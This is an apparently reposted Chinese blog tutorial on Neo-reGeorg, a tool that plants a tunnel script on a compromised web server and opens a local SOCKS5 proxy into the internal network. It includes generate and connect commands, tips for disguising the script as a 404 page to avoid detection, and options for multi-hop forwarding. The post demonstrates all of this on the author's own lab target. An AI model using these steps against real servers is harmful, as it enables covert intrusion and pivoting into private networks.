靶场环境的具体部署方法在我的博客
Socks代理之中,这里我沿用一样的靶场环境就不在重复赘述
Neo-reGeorg介绍
reGeorg是用Python为主的去编写的一个HTTP代理工具,也是基于reDuh(java为主编写的,功能和reGeorg类似)的改进版。但reGeorg的最后一次提交时间也是远在16年左右了,并且主要支持Python2的环境,对于网安这种比较注重时效性的场景来说并不是我们最好的选择。
当前最好用的是Neo-reGeorg,他是reGeorg重构项目,并且当前还在不断进行着维护,截止到我写这篇博客的时候,这个项目最新版本为3.0,接下来的使用我也主要是使用3.0进行使用演示。相比于原版,Neo主要改进了以下四点:
- 提高 tunnel 连接安全性(添加了连接密码,原版中连接是不需要密码的)
- 提高可用性,避免特征检测(原版的源码是直接明文显示的,容易被特征检查)
- 提高传输内容保密性(将传输内容进行了加密)
- 应对更多的网络环境场景(相比于原版,支持的格式更多了)
Neo - reGrorg可以看成reDuh的超集,他支持以ASPX,ASHX,PHP,JSP,JSPX,等WEB脚本调用。
reGrorg和Neo - reGrorg用法比较类似,如果会用Neo - reGrorg后,reGrorg基本也就上手了。
使用方法
基本使用
- 首先我们设置一个连接密码
python .\neoreg.py generate -k 连接密码 -o 指定输出目录
python .\neoreg.py generate -k xunmi
2. 再讲我们生成的脚本上传到目标服务器中,这里我直接上传到我自己的靶机中进行连接(正常情况下,我们应该是拿到目标的web控制台权限或者拿到目标的上传权限才能进行这一步)
3. 连接目标,连接目标后,此脚本会自动生成一个sockets5的代理映射在本地的1080端口上以供我们使用。(选择sockets5:127.0.01:1080
)即可连接使用
python .\neoreg.py -k 连接密码 -u 目标地址
python .\neoreg.py -k xunmi -u http://220.167.109.177:45783/tunnel.php
PS: 可以使用-i IP
和-P 端口
来更换开启的IP和端口
生成指定页面
默认情况下,我们生成的页面是空白页面,并且返回值是200,也就是成功的意思。为了避免被发现,我们可以伪造成404页面。
这里我们生成页面代理脚本的时候主要会用到-f(--file)
和-c(--httpcode)
-f
: 指定我们要伪装的页面样式,多少情况下我们会选择伪装成目标报错页面之类的静态页面,假如我们想要伪造成目标的404页面,先把目标源码离线下来在这里指定即可。-c
: 指定页面的返回值.默认情况下是200。
python neoreg.py generate -k xunmi --file 404.html --httpcode 404 -o xunmi_phpstudy404_404
常用连接参数
在连接目标的时候我们可以携带特定的请求头-H
或者-c
饼干(cookie),如果出现多层网络代理,这需要用到网络转发功能-t
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)